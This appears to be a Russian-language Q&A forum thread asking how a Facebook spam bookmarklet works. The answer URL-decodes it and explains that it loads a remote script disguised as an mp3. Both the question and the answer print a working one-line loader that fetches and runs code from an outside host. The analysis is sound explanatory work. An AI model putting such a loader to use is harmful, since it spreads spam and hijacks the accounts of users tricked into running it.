Question

Итак, я только что видел этот спам-код на Facebook, написанный на JavaScript, и я подумал, может ли кто-нибудь объяснить мне, как этот код работает и взаимодействует с Facebook. Я не собираюсь использовать это в злонамеренных целях, но я просто заинтересован в безопасности таких сайтов, как Facebook. Вот код, который выполняется из адресной строки (я советую не пробовать его самостоятельно, у вас может получиться несколько раздраженных друзей).

javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM  ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)

Arend · Answer 1 · 06 июня 2011

Проверьте здесь, ссылка в кодировке URL.

http://meyerweb.com/eric/tools/dencoder/

JavaScript:

a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)

Из того, что я вижу: загрузите этот URL как скрипт и добавьте его на текущую страницу.

Edit: Загруженный скрипт размещается по этому адресу: http://www.raxarstudios.com/x/audiotrack2.mp3

Это маскируется под песню в формате mp3, но это просто javascript: http://pastebin.com/RVmNVtt9 Я быстро взглянул на него, он явно использует тяжелый ajax для добавления событий и присоединения к нему себя.

Объяснение спам-кода Facebook

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Объяснение спам-кода Facebook

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Похожие темы